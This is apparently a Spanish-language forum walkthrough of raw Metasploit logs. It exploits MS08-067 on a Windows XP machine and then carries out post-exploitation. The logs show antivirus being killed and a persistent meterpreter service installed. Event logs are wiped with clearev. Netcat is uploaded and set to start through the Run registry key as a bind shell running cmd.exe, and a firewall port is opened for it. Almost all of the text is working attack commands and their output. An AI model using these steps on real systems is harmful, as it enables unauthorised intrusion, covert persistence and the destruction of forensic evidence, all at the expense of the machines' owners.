=[ metasploit v4.3.0-dev [core:4.3 api:1.0]+ -- --=[ 815 exploits - 459 auxiliary - 137 post+ -- --=[ 248 payloads - 27 encoders - 8 nops =[ svn r14995 updated -3719 days ago (2012.03.20)msf > use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcpmsf exploit(ms08_067_netapi) > set LHOST 192.168.1.100LHOST => 192.168.1.100msf exploit(ms08_067_netapi) > set RHOST 192.168.1.101RHOST => 192.168.1.101msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish[*] Selected Target: Windows XP SP3 Spanish (NX)[*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.101[*] Meterpreter session 1 opened (192.168.1.100:1481 -> 192.168.1.101:4444) at 2002-01-13 16:05:53 -0200meterpreter >
meterpreter > helpCore Commands============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel detach Detach the meterpreter session (for http/https) disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channelStdapi: File system Commands============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directoryStdapi: Networking Commands=========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing tableStdapi: System Commands======================= Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OSStdapi: User interface Commands=============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface componentsStdapi: Webcam Commands======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcamPriv: Elevate Commands====================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system.Priv: Password database Commands================================ Command Description ------- ----------- hashdump Dumps the contents of the SAM databasePriv: Timestomp Commands======================== Command Description ------- ----------- timestomp Manipulate file MACE attributesmeterpreter >
meterpreter > getpidCurrent pid: 1036meterpreter > psProcess list============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 NT AUTHORITY\SYSTEM 252 wpabaln.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\wpabaln.exe 324 rundll32.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\rundll32.exe 360 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 524 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 556 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 668 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 680 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 844 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 944 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1036 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1080 explorer.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\Explorer.EXE 1216 alg.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\System32\alg.exe 1220 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1292 svchost.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\system32\svchost.exe 1400 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1512 ctfmon.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\ctfmon.exe 1944 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exemeterpreter > migrate 1080[*] Migrating to 1080...[*] Migration completed successfully.meterpreter > getpidCurrent pid: 1080meterpreter >
meterpreter > run killav[*] Killing Antivirus services on the target...meterpreter > run getcountermeasure[*] Running Getcountermeasure on the target...[*] Checking for contermeasures...[*] Getting Windows Built in Firewall configuration...[*][*] Configuración del perfil Dominio:[*] -------------------------------------------------------------------[*] Modo funcional = Habilitar[*] Modo de excepción = Habilitar[*][*] Configuración del perfil Estándar (actual):[*] -------------------------------------------------------------------[*] Modo funcional = Deshabilitar[*] Modo de excepción = Habilitar[*][*] Configuración del servidor de seguridad Conexión de área local:[*] -------------------------------------------------------------------[*] Modo funcional = Habilitar[*][*] Checking DEP Support Policy...meterpreter >
meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\RuaehbuTVStIsh...[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service... * Installing service metsvcCannot create service (0x00000431)meterpreter >
meterpreter > rebootRebooting...
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcppayload => windows/metsvc_bind_tcpmsf exploit(handler) > set LPORT 31337LPORT => 31337msf exploit(handler) > set RHOST 192.168.1.101RHOST => 192.168.1.101msf exploit(handler) > exploit[*] Started bind handler[*] Starting the payload handler...[*] Meterpreter session 2 opened (192.168.1.100:1576 -> 192.168.1.101:31337) at2002-01-13 16:30:32 -0200meterpreter >
meterpreter > getpidCurrent pid: 1864meterpreter > psProcess list============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 NT AUTHORITY\SYSTEM 356 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 476 explorer.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\Explorer.EXE 512 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 552 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 664 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 676 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 840 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 948 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1024 alg.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\System32\alg.exe 1044 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1124 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1180 ctfmon.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\ctfmon.exe 1288 svchost.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\system32\svchost.exe 1420 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1724 wuauclt.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe 1864 metsvc-server.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe 1964 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe 2032 wpabaln.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\wpabaln.exemeterpreter >
meterpreter > clearev[*] Wiping 86 records from Application...[*] Wiping 144 records from System...[*] Wiping 0 records from Security...meterpreter >
meterpreter > shellProcess 452 created.Channel 1 created.Microsoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrador>exitmeterpreter >
meterpreter > sysinfoComputer : HACKXCRA-7848AAOS : Windows XP (Build 2600, Service Pack 3).Architecture : x86System Language : es_ESMeterpreter : x86/win32meterpreter >
Esta muy bueno aunque me gustaria ver alguna intrusión en vez de windows xp... al 7
meterpreter > upload C:\\nc.exe C:\\windows\\system32[*] uploading : C:\nc.exe -> C:\windows\system32[*] uploaded : C:\nc.exe -> C:\windows\system32\nc.exemeterpreter >
meterpreter >reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\runEnumerating: HKLM\software\microsoft\windows\currentversion\run Values (1): ncmeterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"Successful set nc.meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v ncKey: HKLM\software\microsoft\windows\currentversion\RunName: ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe
meterpreter > execute -f cmd -iProcess 1600 created.Channel 2 created.Microsoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>netsh firewall show opmodenetsh firewall show opmodeConfiguración del perfil Dominio:-------------------------------------------------------------------Modo funcional = HabilitarModo de excepción = HabilitarConfiguración del perfil Estándar (actual):-------------------------------------------------------------------Modo funcional = DeshabilitarModo de excepción = HabilitarConfiguración del servidor de seguridad Conexión de área local:-------------------------------------------------------------------Modo funcional = Habilitar
C:\WINDOWS\system32>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALLnetsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALLOk.
C:\WINDOWS\system32>netsh firewall show portopeningnetsh firewall show portopeningPort configuration for Domain profile:Port Protocol Mode Name-------------------------------------------------------------------139 TCP Enable NetBIOS Session Service445 TCP Enable SMB over TCP137 UDP Enable NetBIOS Name Service138 UDP Enable NetBIOS Datagram ServicePort configuration for Standard profile:Port Protocol Mode Name-------------------------------------------------------------------455 TCP Enable Service Firewall139 TCP Enable NetBIOS Session Service445 TCP Enable SMB over TCP137 UDP Enable NetBIOS Name Service138 UDP Enable NetBIOS Datagram ServiceC:\WINDOWS\system32>
nc -v 192.168.1.101 455
meterpreter > psProcess list============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 NT AUTHORITY\SYSTEM 256 explorer.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\Explorer.EXE 360 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 516 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 548 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 620 alg.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\System32\alg.exe 660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 672 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 800 nc.exe x86 0 HACKXCRA-7848AA\Administrador C:\windows\system32\nc.exe 844 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 864 ctfmon.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\ctfmon.exe 928 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1040 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1236 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe 1288 svchost.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\system32\svchost.exe 1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1712 wuauclt.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe 1784 cmd.exe x86 0 HACKXCRA-7848AA\Administrador C:\windows\system32\cmd.exe 1848 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe 1920 metsvc-server.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe 1940 wpabaln.exe x86 0 HACKXCRA-7848AA\Administrador C:\WINDOWS\system32\wpabaln.exemeterpreter >